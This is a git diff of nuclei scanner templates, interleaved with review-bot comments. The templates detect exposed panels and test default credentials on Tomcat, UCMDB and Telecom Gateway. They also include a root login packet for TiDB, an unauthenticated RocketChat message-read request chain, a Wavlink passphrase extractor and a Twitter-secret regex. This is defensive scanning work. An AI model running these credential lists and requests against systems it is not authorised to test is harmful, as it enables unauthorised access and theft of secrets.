--- a/poc/auth/symantec-ewep-login-10606.yaml +++ b/poc/auth/symantec-ewep-login-10606.yaml @@ -3,7 +3,8 @@ info: name: Symantec Encryption Web Email Protection author: johnk3r severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 + metadata: + shodan-query: http.title:"Symantec Encryption Server" tags: panel,symantec,login requests: - method: GET diff --git a/poc/auth/szhe-default-login-10636.yaml b/poc/auth/szhe-default-login-10636.yaml index 64f4525692..261f6d9060 100644 --- a/poc/auth/szhe-default-login-10636.yaml +++ b/poc/auth/szhe-default-login-10636.yaml @@ -2,10 +2,16 @@ id: szhe-default-login info: name: Szhe Default Login author: pikpikcu - severity: low + description: Szhe default login information was discovered. + severity: medium tags: szhe,default-login reference: - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -32,3 +38,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/szhe-default-login.yaml b/poc/auth/szhe-default-login-10638.yaml similarity index 100% rename from poc/auth/szhe-default-login.yaml rename to poc/auth/szhe-default-login-10638.yaml diff --git a/poc/auth/telecom-gateway-default-login-10686.yaml b/poc/auth/telecom-gateway-default-login-10686.yaml index 73abc6eada..08f2ecd266 100644 --- a/poc/auth/telecom-gateway-default-login-10686.yaml +++ b/poc/auth/telecom-gateway-default-login-10686.yaml 
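Review bot: The new `classification` block in szhe-default-login-10636.yaml contains `cve-id:` with no value, which parses as null and adds nothing; remove the key until a CVE exists. `cwe-id: CWE-522` is also at odds with ucmdb-default-login-10871.yaml in this commit, which files a default-credential finding under `CWE-798`; the default-login templates should agree on one of the two. The request block continues outside the hunk.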
@@ -1,15 +1,12 @@ id: telecom-gateway-default-login info: - name: Telecom Gateway - Default Admin Login + name: Telecom Gateway Default Login author: ritikchaddha severity: high - description: Telecom Gateway default admin login credentials were successful. - metadata: - max-request: 1 - tags: default-login,telecom,gateway + tags: telecom,default-login,gateway -http: +requests: - raw: - | POST /manager/login.php HTTP/1.1 @@ -23,9 +20,8 @@ http: - admin password: - admin - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word @@ -39,5 +35,3 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a367ccbfabd23210af96b3439c4ba6cbe08f9800ae62553ccd130828136642480220114c4652ae60ed84e6ae4c520992c75d8e25f826fd02f172fcc9e416309fe566:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/telecom-gateway-default-login.yaml b/poc/auth/telecom-gateway-default-login.yaml new file mode 100644 index 0000000000..d0730e1ba5 --- /dev/null +++ b/poc/auth/telecom-gateway-default-login.yaml @@ -0,0 +1,33 @@ +id: telecom-gateway-default-login +info: + name: Telecom Gateway Default Login + author: ritikchaddha + severity: high + tags: telecom,default-login,gateway +requests: + - raw: + - | + POST /manager/login.php HTTP/1.1 + Host: {{Hostname}} + + Name={{username}}&Pass={{password}} + attack: pitchfork + payloads: + username: + - admin + password: + - admin + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "电信网关服务器管理后台" + - "index-shang.php" + - "di.php" + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/tidb-unauth-10770.yaml b/poc/auth/tidb-unauth-10770.yaml new file mode 100644 index 0000000000..c4c6a133b8 --- /dev/null +++ b/poc/auth/tidb-unauth-10770.yaml 
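Review bot: `redirects: true` on the new side of telecom-gateway-default-login-10686.yaml replaces `host-redirects: true`, so after the login POST nuclei follows up to two redirects to any host and the body words are matched against whatever that host returns. Keep `host-redirects: true` so a match is always attributable to the scanned target. The added telecom-gateway-default-login.yaml has the same `redirects: true` line and the same `id`, so the two files also duplicate each other.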
@@ -0,0 +1,23 @@ +id: tidb-unauth +info: + name: Unauth TiDB Disclosure + author: lu4nx + severity: high + metadata: + zoomeye-dork: tidb +port:"4000" + tags: network,tidb,unauth +network: + - inputs: + - read: 1024 # skip handshake packet + - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication + type: hex + host: + - "{{Hostname}}" + - "{{Host}}:4000" + read-size: 1024 + matchers: + - type: binary + binary: + # resp format: + # 07: length, 02: sequence number, 00: success + - "0700000200000002000000" diff --git a/poc/auth/tidb-unauth-10772.yaml b/poc/auth/tidb-unauth-10772.yaml deleted file mode 100644 index 8121309890..0000000000 --- a/poc/auth/tidb-unauth-10772.yaml +++ /dev/null 
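Review bot: poc/auth/tidb-unauth-10770.yaml is added at `severity: high` with no `description`, although tidb-unauth-10772.yaml, deleted in this commit, had one. A reader triaging a hit has only the hex blob and the word "authentication" to go on; the packet appears to be a MySQL-protocol login as `root` with an empty auth response, and the comment next to `data:` should say so. Restore `description: TiDB server was able to be accessed because no authentication was required.` and add a `remediation:` line telling the operator to set a password on the account and limit access to port 4000.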
@@ -1,26 +0,0 @@ -id: tidb-unauth -info: - name: TiDB - Unauthenticated Access - author: lu4nx - severity: high - description: TiDB server was able to be accessed because no authentication was required. - metadata: - zoomeye-dork: tidb +port:"4000" - tags: network,tidb,unauth -network: - - inputs: - - read: 1024 # skip handshake packet - - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication - type: hex - host: - - "{{Hostname}}" - - "{{Host}}:4000" - read-size: 1024 - matchers: - - type: binary - binary: - # resp format: - # 07: length, 02: sequence number, 00: success - - "0700000200000002000000" - -# Enhanced by mp on 2022/07/20 diff --git a/poc/auth/tomcat-default-login-10791.yaml b/poc/auth/tomcat-default-login-10791.yaml index 4e522c9229..514e77dbe1 100644 --- a/poc/auth/tomcat-default-login-10791.yaml +++ b/poc/auth/tomcat-default-login-10791.yaml @@ -1,6 +1,6 @@ id: tomcat-default-login info: - name: ApahceTomcat Manager Default Login + name: Apache Tomcat Manager Default Login author: pdteam severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. diff --git a/poc/auth/tomcat-default-login.yaml b/poc/auth/tomcat-default-login.yaml new file mode 100644 index 0000000000..662fd6f3ac --- /dev/null +++ b/poc/auth/tomcat-default-login.yaml 
@@ -0,0 +1,76 @@ +id: tomcat-default-login + +info: + name: Apache Tomcat Manager Default Login + author: pdteam + severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. + reference: + - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ + tags: tomcat,apache,default-login + +requests: + - raw: + - | + GET /manager/html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - tomcat + - admin + - ovwebusr + - j2deployer + - cxsdk + - ADMIN + - xampp + - tomcat + - QCC + - admin + - root + - role1 + - role + - tomcat + - admin + - role1 + - both + - admin + + password: + - tomcat + - admin + - OvW*busr1 + - j2deployer + - kdsxc + - ADMIN + - xampp + - s3cret + - QLogic66 + - tomcat + - root + - role1 + - changethis + - changethis + - j5Brn9 + - tomcat + - tomcat + - 123456 + + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/tracer-sc-login.yaml b/poc/auth/tracer-sc-login.yaml index 41c01692f2..ebe33fde3a 100644 --- a/poc/auth/tracer-sc-login.yaml +++ b/poc/auth/tracer-sc-login.yaml 
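Review bot: The pitchfork lists in tomcat-default-login.yaml send 18 Basic-auth attempts per target, with `admin` used four times and `tomcat` three times, and there is no `stop-at-first-match`. Tomcat's LockOutRealm locks a user after repeated failures (five by default), so later pairs for the same user can fail even when the password is right, and a legitimate administrator can be locked out by the scan. Add `stop-at-first-match: true` next to `attack: pitchfork`, and record the cost as `metadata:` with `max-request: 18` so operators see it before running the template.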
@@ -1,23 +1,38 @@ id: tracer-sc-login + info: - name: Tracer SC login panel + name: Tracer SC Login Panel - Detect author: geeknik severity: info - reference: https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html + description: Tracer SC login panel was detected. + reference: + - https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: tracer,trane,iot,panel,login -requests: + +http: - method: GET path: - "{{BaseURL}}/hui/index.html" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Tracer SC" + - type: word part: header words: - "text/html" + +# digest: 490a004630440220586e31fea6c6370b8cdbbfedfd72de8617dd9df5dec16bd17631e3ffb4cc4f380220365b54fb1158abdf005462f86436a7f98171342b816a494be549d6fd2efba4a5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/twitter-secret-10862.yaml b/poc/auth/twitter-secret-10862.yaml index 713cfd3069..824660405a 100644 --- a/poc/auth/twitter-secret-10862.yaml +++ b/poc/auth/twitter-secret-10862.yaml @@ -1,7 +1,7 @@ id: twitter-secret info: name: Twitter Secret - author: gaurang + author: gaurang,daffainfo severity: medium tags: token,file,twitter file: @@ -11,3 +11,4 @@ file: - type: regex regex: - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" + - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" diff --git a/poc/auth/twitter-secret.yaml b/poc/auth/twitter-secret.yaml index 824660405a..0a89da00fa 100644 --- a/poc/auth/twitter-secret.yaml +++ b/poc/auth/twitter-secret.yaml @@ -1,4 +1,5 @@ id: twitter-secret + info: name: Twitter Secret author: gaurang,daffainfo 
@@ -7,8 +8,11 @@ info: file: - extensions: - all + extractors: - type: regex regex: - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" + +# digest: 4a0a00473045022100d0efec25fa4880fa1dcfdbb4303fc8bfeaddf4e62c15395ce9d0443c2d773e9702202bbf2fbd6b1be33572a5fa33d3a51876ae77d10a60a6474ff61bde7f6cdd3498:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ucmdb-default-login-10868.yaml b/poc/auth/ucmdb-default-login-10868.yaml index 7f92b3251a..169611f6d5 100644 --- a/poc/auth/ucmdb-default-login-10868.yaml +++ b/poc/auth/ucmdb-default-login-10868.yaml @@ -4,8 +4,7 @@ info: name: Micro Focus Universal CMDB Default Login author: dwisiswant0 severity: high - description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 - and CVE-2020-11854. + description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854. reference: - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm classification: diff --git a/poc/auth/ucmdb-default-login-10871.yaml b/poc/auth/ucmdb-default-login-10871.yaml new file mode 100644 index 0000000000..7f92b3251a --- /dev/null +++ b/poc/auth/ucmdb-default-login-10871.yaml 
@@ -0,0 +1,41 @@ +id: ucmdb-default-login + +info: + name: Micro Focus Universal CMDB Default Login + author: dwisiswant0 + severity: high + description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 + and CVE-2020-11854. + reference: + - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm + classification: + cwe-id: CWE-798 + tags: ucmdb,default-login + +requests: + - raw: + - | + POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1 + Host: {{Hostname}} + + customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB + + attack: pitchfork + payloads: + username: + - diagnostics + password: + - admin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "LWSSO_COOKIE_KEY" + +# Enhanced by mp on 2022/03/07 diff --git a/poc/auth/ucmdb-default-login-10869.yaml b/poc/auth/ucmdb-default-login.yaml similarity index 100% rename from poc/auth/ucmdb-default-login-10869.yaml rename to poc/auth/ucmdb-default-login.yaml diff --git a/poc/auth/unauth-ftp-10939.yaml b/poc/auth/unauth-ftp-10939.yaml index e3c21171fa..4e68ffae34 100644 --- a/poc/auth/unauth-ftp-10939.yaml +++ b/poc/auth/unauth-ftp-10939.yaml @@ -1,23 +1,18 @@ id: unauth-ftp - info: name: FTP Anonymous Login - author: C3l3si4n + author: Celesian ( @C3l3si4n ) severity: medium - reference: - - https://tools.ietf.org/html/rfc2577 + reference: https://tools.ietf.org/html/rfc2577 tags: network,ftp - network: - inputs: - data: "USER anonymous\r\nPASS nuclei\r\n" - host: - - "{{Host}}:21" - "{{Hostname}}" - + - "{{Hostname}}:21" matchers: - type: word words: - "Anonymous access allowed," - part: response \ No newline at end of file + part: all 
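Review bot: The host list in unauth-ftp-10939.yaml now ends with `- "{{Hostname}}:21"` where the old side had `- "{{Host}}:21"`. In nuclei `{{Hostname}}` already carries the port when the input has one, so an input given as host:port yields an address with two ports, the connection fails, and the result is a silent miss rather than an error. Keep `- "{{Host}}:21"` for the fixed-port entry, as tidb-unauth-10770.yaml in this commit does with `{{Host}}:4000`.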
diff --git a/poc/auth/unauth-ftp-10942.yaml b/poc/auth/unauth-ftp-10942.yaml deleted file mode 100644 index 12d9dba01b..0000000000 --- a/poc/auth/unauth-ftp-10942.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: unauth-ftp -info: - name: FTP Anonymous Login - author: C3l3si4n - severity: medium - reference: https://tools.ietf.org/html/rfc2577 - tags: network,ftp -network: - - inputs: - - data: "USER anonymous\r\nPASS nuclei\r\n" - host: - - "{{Host}}:21" - - "{{Hostname}}" - matchers: - - type: word - words: - - "Anonymous access allowed," - part: all diff --git a/poc/auth/unauth-hoteldruid-panel-10943.yaml b/poc/auth/unauth-hoteldruid-panel-10943.yaml deleted file mode 100644 index c30b9ab48e..0000000000 --- a/poc/auth/unauth-hoteldruid-panel-10943.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: unauth-hoteldruid-panel - -info: - name: Hoteldruid Management Panel Access - author: princechaddha - severity: high - description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. - reference: - - https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42949.json - - https://www.hoteldruid.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 2 - tags: hoteldruid,panel,unauth - -http: - - method: GET - path: - - "{{BaseURL}}/hoteldruid/inizio.php" - - "{{BaseURL}}/inizio.php" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - " HotelDruid " - - "INSERT:" - - "TABLES:" - condition: and - -# digest: 4b0a00483046022100b167cc0851722d7c32a687f0349ff4aeb493bfa181a2bafa03726b549b68c194022100a9e8558089ffe0f9a1b3900510ed9a46ed69d19f65e2e77f076e8dae01f1410a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-hoteldruid-panel.yaml b/poc/auth/unauth-hoteldruid-panel.yaml new file mode 100644 index 0000000000..9897bff31a --- /dev/null 
+++ b/poc/auth/unauth-hoteldruid-panel.yaml @@ -0,0 +1,25 @@ +id: unauth-hoteldruid-panel +info: + name: Unauthenticated Hoteldruid Panel + author: princechaddha + severity: high + description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. + reference: https://www.hoteldruid.com/ + tags: hoteldruid,panel,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/hoteldruid/inizio.php" + - "{{BaseURL}}/inizio.php" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - " HotelDruid " + - "INSERT:" + - "TABLES:" + condition: and diff --git a/poc/auth/unauth-message-read-10947.yaml b/poc/auth/unauth-message-read-10947.yaml index 5f53cf4e40..81cd8e1c7b 100644 --- a/poc/auth/unauth-message-read-10947.yaml +++ b/poc/auth/unauth-message-read-10947.yaml 
@@ -1,13 +1,26 @@ id: rocketchat-unauth-access + info: - name: RocketChat Unauthenticated Read Access + name: RocketChat Live Chat - Unauthenticated Read Access author: rojanrijal - severity: critical - description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens. + severity: high + description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens. + remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8. reference: - https://docs.rocket.chat/guides/security/security-updates + - https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-522 + metadata: + max-request: 2 tags: rocketchat,unauth -requests: +variables: + value: "{{to_lower(rand_text_alpha(5))}}" + user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" + +http: - raw: - | POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 
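Review bot: `user_email` in the new `variables:` block is built from `{{username}}`, but nothing visible in either hunk of unauth-message-read-10947.yaml defines `username` (there is no `payloads:` section), so the placeholder is likely to stay unresolved and the first request is skipped or sent with the literal text. Generate the local part instead: `user_email: "{{to_lower(rand_text_alpha(5))}}@{{to_lower(rand_text_alphanumeric(6))}}.com"`. The template also registers a live-chat guest on every target it runs against, which the `description` should state so operators know the check writes data. Two lines of the file between the hunks are not shown.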
@@ -16,22 +29,26 @@ requests: Content-Type: application/json Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"} + {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"{{value}}\",\"name\":\"cve-2020-{{value}}\",\"email\":\"{{user_email}}\"}],\"id\":\"123\"}"} - | POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json - {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} + {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"{{value}}\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - '"{\"msg\":\"result\",\"result\":{\"messages\"' - '"success":true' - part: body condition: and + + - type: status + status: + - 200 + +# digest: 4b0a0048304602210095085dc96a7cb508eefb70fb2096b11370550b5fc48bf2778a9fe85c1c1d2726022100e82787c9db9e4546b785b8bd5997137083fc5de11cfbde2b2f1b775a62ef1ce2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-spark-api-10963.yaml b/poc/auth/unauth-spark-api-10963.yaml index 504318c39a..5575a73ff9 100644 --- a/poc/auth/unauth-spark-api-10963.yaml +++ b/poc/auth/unauth-spark-api-10963.yaml 
@@ -3,26 +3,30 @@ id: unauth-spark-api info: name: Unauthenticated Spark REST API author: princechaddha - severity: medium + severity: critical description: The Spark product's REST API interface allows access to unauthenticated users. + remediation: Restrict access the exposed API ports. reference: - https://xz.aliyun.com/t/2490 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - remediation: Restrict access the exposed API ports. + metadata: + max-request: 1 tags: spark,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/v1/submissions" + matchers-condition: and matchers: - type: status status: - 400 + - type: word words: - "Missing an action" @@ -30,4 +34,4 @@ requests: part: body condition: and -# Enhanced by cs on 2022/02/28 +# digest: 4a0a00473045022018b659baec610f87c26890d0fb5845caeb74f982b891f1d7962fc76f1cc74819022100fbbd51799d7374a2ec8d0ce526872a8541093e2d98a549188fca7c8890f25681:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-spark-api.yaml b/poc/auth/unauth-spark-api.yaml deleted file mode 100644 index 2025d7145b..0000000000 --- a/poc/auth/unauth-spark-api.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: unauth-spark-api -info: - name: Unauthenticated Spark REST API - author: princechaddha - severity: medium - description: The Spark product's REST API interface allows access to unauthenticated users. - remediation: Restrict access the exposed API ports. - reference: https://xz.aliyun.com/t/2490 - tags: spark,unauth - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 -requests: - - method: GET - path: - - "{{BaseURL}}/v1/submissions" - matchers-condition: and - matchers: - - type: status - status: - - 400 - - type: word - words: - - "Missing an action" - - "serverSparkVersion" - part: body - condition: and - -# Enhanced by cs on 2022/02/28 
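Review bot: `cwe-id: CWE-77` stays in place while the first hunk of unauth-spark-api-10963.yaml raises `severity` to critical, yet the matchers only show that `/v1/submissions` answers without authentication (status 400 plus `Missing an action` and `serverSparkVersion`); `CWE-306`, missing authentication, describes what is actually detected. The moved line `remediation: Restrict access the exposed API ports.` is missing a word and should read `remediation: Restrict access to the exposed API ports.`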
diff --git a/poc/auth/unauth-wavink-panel-10967.yaml b/poc/auth/unauth-wavink-panel-10967.yaml new file mode 100644 index 0000000000..3a38b04d8e --- /dev/null +++ b/poc/auth/unauth-wavink-panel-10967.yaml @@ -0,0 +1,48 @@ +id: unauth-wavink-panel + +info: + name: Wavlink Panel - Unauthenticated Access + author: princechaddha + severity: high + description: Wavlink Panel was able to be accessed with no authentication requirements in place. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Wi-Fi APP Login" + tags: exposure,wavlink,unauth,misconfig,router + +http: + - method: GET + path: + - "{{BaseURL}}/wifi_base.shtml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "APP" + + - type: regex + part: body + regex: + - 'var passphraseKey12="(.*)";' + + - type: word + part: body + negative: true + words: + - 'var passphraseKey12="";' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'var passphraseKey12="(.*)";' + +# digest: 4a0a00473045022001a73c92e30b7d3d758141d3c02a0556b645c3db302df3ec3d4cdcc924c4a9d70221009cb70454a96ce29bd3cbd76b6c13e1c5d16ec80883c57b37e6178534b653a869:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-xproxy-dashboard-10968.yaml b/poc/auth/unauth-xproxy-dashboard-10968.yaml deleted file mode 100644 index c7d01f13ff..0000000000 --- a/poc/auth/unauth-xproxy-dashboard-10968.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauth-xproxy-dashboard -info: - name: X-Proxy Dashboard Detect - author: pussycat0x - severity: high - metadata: - fofa-dork: "X-Proxy Dashboard" - tags: xproxy,panel -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'X-Proxy' - - 'Dashboard' - condition: and - - type: status - status: - - 200 
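Review bot: The pattern `'var passphraseKey12="(.*)";'` in unauth-wavink-panel-10967.yaml is greedy, so on a page where several statements share one line the capture runs to the last `";` and the extractor returns more than the key. Using `- 'var passphraseKey12="([^"]+)";'` in both the matcher and the extractor fixes that and makes the negative matcher on `var passphraseKey12="";` unnecessary. The extracted value is presumably the Wi-Fi passphrase, so scan output from this template should be handled as a secret. The file name and `id` spell the product "wavink" while `name` and `tags` use "Wavlink".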
diff --git a/poc/auth/unauth-xproxy-dashboard-10969.yaml b/poc/auth/unauth-xproxy-dashboard-10969.yaml new file mode 100644 index 0000000000..2e76185f13 --- /dev/null +++ b/poc/auth/unauth-xproxy-dashboard-10969.yaml @@ -0,0 +1,27 @@ +id: unauth-xproxy-dashboard + +info: + name: X-Proxy Dashboard Detect + author: pussycat0x + severity: high + metadata: + fofa-dork: "X-Proxy Dashboard" + tags: xproxy,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'X-Proxy' + - 'Dashboard' + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/unauth-xproxy-dashboard.yaml b/poc/auth/unauth-xproxy-dashboard.yaml index 2e76185f13..c7d01f13ff 100644 --- a/poc/auth/unauth-xproxy-dashboard.yaml +++ b/poc/auth/unauth-xproxy-dashboard.yaml @@ -1,5 +1,4 @@ id: unauth-xproxy-dashboard - info: name: X-Proxy Dashboard Detect author: pussycat0x @@ -7,12 +6,10 @@ info: metadata: fofa-dork: "X-Proxy Dashboard" tags: xproxy,panel - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word @@ -21,7 +18,6 @@ requests: - 'X-Proxy' - 'Dashboard' condition: and - - type: status status: - 200 diff --git a/poc/auth/unauthenticated-airflow-10884.yaml b/poc/auth/unauthenticated-airflow-10884.yaml new file mode 100644 index 0000000000..50ca17d92a --- /dev/null +++ b/poc/auth/unauthenticated-airflow-10884.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-airflow-instance + +info: + name: Unauthenticated Airflow Instance + author: dhiyaneshDK + severity: high + tags: apache,airflow,unauth + metadata: + shodan-query: title:"Airflow - DAGs" + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/admin/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Airflow - DAGs" + + - type: status + status: + - 200 
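Review bot: poc/auth/unauth-xproxy-dashboard-10969.yaml reports `severity: high` on the strength of two generic words, `X-Proxy` and `Dashboard`, in a 200 response from `{{BaseURL}}`; nothing in the matchers shows that the dashboard works without logging in, so a login page carrying that title matches too. Lower it to `severity: info`, in line with its name "X-Proxy Dashboard Detect" and its `panel` tag, or add a matcher on content that is only served to an unauthenticated session that got through. The same `id: unauth-xproxy-dashboard` is also carried by unauth-xproxy-dashboard.yaml in this commit.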
diff --git a/poc/auth/unauthenticated-airflow-10886.yaml b/poc/auth/unauthenticated-airflow-10886.yaml deleted file mode 100644 index afe4ed1f3c..0000000000 --- a/poc/auth/unauthenticated-airflow-10886.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauthenticated-airflow-instance -info: - name: Unauthenticated Airflow Instance - author: dhiyaneshDK - severity: high - metadata: - shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/admin/" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Airflow - DAGs" - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-airflow.yaml b/poc/auth/unauthenticated-airflow.yaml index 93eb15068c..afe4ed1f3c 100644 --- a/poc/auth/unauthenticated-airflow.yaml +++ b/poc/auth/unauthenticated-airflow.yaml @@ -1,31 +1,23 @@ id: unauthenticated-airflow-instance - info: name: Unauthenticated Airflow Instance author: dhiyaneshDK severity: high metadata: - max-request: 2 shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth,misconfig - -http: + tags: apache,airflow,unauth +requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/admin/" - stop-at-first-match: true - matchers-condition: and matchers: - type: word part: body words: - "Airflow - DAGs" - - type: status status: - 200 - -# digest: 4a0a004730450221008ff04d74351dc40542a499d88517999e66dc8504d16a8fa83df765ab850de2cc0220093c9335dd06ec425df7afb41e2306101fb637e6c30106c02891f8c001e7e805:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-alert-manager-10888.yaml b/poc/auth/unauthenticated-alert-manager-10888.yaml index e1036fc73c..b6de2aadd0 100644 --- a/poc/auth/unauthenticated-alert-manager-10888.yaml +++ b/poc/auth/unauthenticated-alert-manager-10888.yaml 
